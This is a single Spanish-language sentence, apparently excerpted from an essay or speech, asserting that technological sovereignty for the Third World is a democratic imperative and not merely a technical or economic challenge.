La soberanía Tecnológica del Tercer Mundo no constituye solo un desafío
técnico o económico, sino un imperativo democrático.